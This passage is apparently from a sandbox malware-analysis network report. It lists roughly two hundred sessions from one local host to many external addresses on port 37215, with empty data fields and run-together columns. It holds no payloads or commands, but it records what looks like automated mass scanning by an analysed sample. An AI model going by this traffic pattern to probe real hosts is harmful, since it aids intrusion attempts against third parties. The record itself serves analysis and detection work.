                                                                            27796192.168.2.1548948156.89.175.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27797192.168.2.1549182156.171.24.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27798192.168.2.1553538156.108.202.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27799192.168.2.1542864156.221.171.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27800192.168.2.1555094156.155.62.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27801192.168.2.1539614156.82.237.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27802192.168.2.1544220156.25.15.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27803192.168.2.1542620156.134.132.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27804192.168.2.1549202156.72.150.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27805192.168.2.1553204156.185.52.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27806192.168.2.1551970156.84.36.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27807192.168.2.1552250156.74.65.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27808192.168.2.1547672156.47.132.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27809192.168.2.1548298156.13.238.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27810192.168.2.1548068156.85.52.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27811192.168.2.1557302156.209.129.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27812192.168.2.1533740156.67.108.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27813192.168.2.1554592156.66.232.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27814192.168.2.1539580156.83.193.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27815192.168.2.1551070156.177.135.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27816192.168.2.1550244156.79.16.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27817192.168.2.1557380156.146.135.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27818192.168.2.1551218156.224.66.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27819192.168.2.1540296156.154.199.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27820192.168.2.1537522156.215.5.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27821192.168.2.1552720156.157.192.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27822192.168.2.1551958156.190.200.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27823192.168.2.1540728156.59.18.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27824192.168.2.1551306156.232.108.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27825192.168.2.1539150156.133.110.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27826192.168.2.1535268156.215.247.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27827192.168.2.1560882156.29.129.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27828192.168.2.1536872156.180.183.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27829192.168.2.1542154156.82.232.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27830192.168.2.1559998156.86.89.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27831192.168.2.1555348156.106.126.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27832192.168.2.1549850156.230.95.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27833192.168.2.1544258156.29.204.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27834192.168.2.1560518156.39.145.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27835192.168.2.1542672156.114.71.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27836192.168.2.1539048156.180.232.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27837192.168.2.1551136156.69.187.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27838192.168.2.1536836156.42.143.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27839192.168.2.1544572156.234.173.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27840192.168.2.1556680156.119.83.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27841192.168.2.1542478156.61.61.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27842192.168.2.1549296156.1.134.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27843192.168.2.1533682156.5.230.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27844192.168.2.1551246156.201.177.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27845192.168.2.1555066156.58.46.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27846192.168.2.1543080156.67.94.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27847192.168.2.1557088156.46.156.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27848192.168.2.1546594156.120.169.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27849192.168.2.1541126156.245.159.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27850192.168.2.1556140156.138.9.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27851192.168.2.1548876156.119.230.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27852192.168.2.1542618156.23.168.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27853192.168.2.1557266156.13.198.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27854192.168.2.1539282156.160.20.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27855192.168.2.1535208156.144.144.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27856192.168.2.1536446156.217.84.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27857192.168.2.1555442156.246.215.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27858192.168.2.1540812156.27.183.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27859192.168.2.1559954156.220.227.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27860192.168.2.1533586156.241.149.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27861192.168.2.1549890156.123.115.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27862192.168.2.1541916156.86.180.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27863192.168.2.1547430156.69.160.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27864192.168.2.1537818156.17.63.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27865192.168.2.1557826156.33.35.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27866192.168.2.1540346156.85.155.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27867192.168.2.1547386156.208.230.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27868192.168.2.1541060156.250.175.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27869192.168.2.1558616156.144.66.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27870192.168.2.1559322156.39.119.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27871192.168.2.1556960156.171.70.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27872192.168.2.1541894156.56.247.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27873192.168.2.1533264156.234.200.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27874192.168.2.1549632156.15.236.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27875192.168.2.1544346156.207.248.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27876192.168.2.1533686156.9.231.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27877192.168.2.1534074156.90.187.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27878192.168.2.1551088156.244.93.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27879192.168.2.1533316156.48.87.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27880192.168.2.1556068156.201.123.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27881192.168.2.1543174156.234.217.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27882192.168.2.1536100156.39.233.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27883192.168.2.1545396156.143.82.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27884192.168.2.1533792156.195.210.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27885192.168.2.1557554156.205.20.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27886192.168.2.1560904156.241.206.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27887192.168.2.1553798156.27.39.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27888192.168.2.1546510156.43.63.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27889192.168.2.1556182156.0.170.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27890192.168.2.1536950156.159.146.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27891192.168.2.1559398156.147.196.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27892192.168.2.1537882156.218.5.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27893192.168.2.1560772156.216.235.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27894192.168.2.1560314156.51.114.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27895192.168.2.1534248156.221.171.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27896192.168.2.1543588156.186.115.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27897192.168.2.1542422156.53.77.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27898192.168.2.1549676156.65.138.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27899192.168.2.1550506156.22.189.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27900192.168.2.1546298156.174.217.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27901192.168.2.1546750156.225.240.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27902192.168.2.1555308156.143.50.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27903192.168.2.1548702156.241.101.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27904192.168.2.1534460156.130.55.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27905192.168.2.1550172156.198.252.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27906192.168.2.1539554156.123.140.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27907192.168.2.1560854156.85.240.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27908192.168.2.1536330156.82.157.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27909192.168.2.1555392156.152.65.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27910192.168.2.1550782156.123.102.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27911192.168.2.1536746156.91.82.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27912192.168.2.1540040156.213.138.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27913192.168.2.1559978156.54.75.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27914192.168.2.1535036156.191.249.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27915192.168.2.1533062156.246.34.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27916192.168.2.1537858156.9.17.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27917192.168.2.1556314156.77.229.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27918192.168.2.1547488156.28.207.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27919192.168.2.1536782156.58.27.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27920192.168.2.1537514156.217.143.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27921192.168.2.1550608156.76.54.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27922192.168.2.1552262156.252.75.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27923192.168.2.1539478156.90.40.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27924192.168.2.1534684156.205.216.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27925192.168.2.1551442156.242.0.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27926192.168.2.1536564156.173.56.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27927192.168.2.1548638156.148.160.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27928192.168.2.1548070156.206.133.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27929192.168.2.1560462156.239.40.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27930192.168.2.1554444156.55.119.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27931192.168.2.1543332156.8.107.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27932192.168.2.1534590156.255.250.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27933192.168.2.1544160156.220.228.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27934192.168.2.1559366156.101.12.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27935192.168.2.154112841.228.114.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27936192.168.2.153652041.218.202.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27937192.168.2.154590241.93.128.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27938192.168.2.155743441.14.4.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27939192.168.2.153459441.223.227.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27940192.168.2.154920041.87.88.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27941192.168.2.154593041.15.184.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27942192.168.2.155300641.248.165.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27943192.168.2.156083241.103.21.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27944192.168.2.154515641.36.221.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27945192.168.2.154731641.168.211.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27946192.168.2.154513641.201.50.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27947192.168.2.155528841.140.65.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27948192.168.2.156076241.104.71.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27949192.168.2.155713041.135.243.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27950192.168.2.155868041.42.101.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27951192.168.2.154856841.158.153.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27952192.168.2.153996241.43.10.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27953192.168.2.154768641.219.211.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27954192.168.2.155065241.137.153.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27955192.168.2.153452841.112.10.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27956192.168.2.154161641.14.215.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27957192.168.2.155826641.186.150.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27958192.168.2.155104041.90.208.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27959192.168.2.153637241.211.148.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27960192.168.2.153944041.41.40.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27961192.168.2.153466241.154.186.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27962192.168.2.155767041.100.104.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27963192.168.2.155647441.103.246.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27964192.168.2.153348641.199.175.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27965192.168.2.154054841.254.1.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27966192.168.2.153305641.39.148.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27967192.168.2.155312841.245.178.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27968192.168.2.154466041.211.114.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27969192.168.2.156038641.2.0.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27970192.168.2.154267041.46.155.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27971192.168.2.153966041.228.212.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27972192.168.2.154666241.195.222.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27973192.168.2.154860441.160.133.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27974192.168.2.155099041.165.166.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27975192.168.2.153444441.84.120.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27976192.168.2.154711841.79.15.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27977192.168.2.155845441.8.181.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27978192.168.2.155430641.192.203.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27979192.168.2.155270841.191.230.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27980192.168.2.153387841.122.29.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27981192.168.2.155551841.233.2.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27982192.168.2.155662841.212.95.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27983192.168.2.153865441.197.224.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27984192.168.2.154999041.135.59.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27985192.168.2.154612441.251.39.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27986192.168.2.155763441.4.15.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27987192.168.2.154220041.186.212.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27988192.168.2.155723441.242.116.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27989192.168.2.156004241.74.151.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27990192.168.2.154754841.158.200.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27991192.168.2.154408441.213.110.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27992192.168.2.153691441.80.164.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27993192.168.2.153318241.138.113.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27994192.168.2.155557041.210.21.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27995192.168.2.155643641.189.216.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27996192.168.2.154701241.164.59.10037215
                                                                            TimestampBytes transferredDirectionData


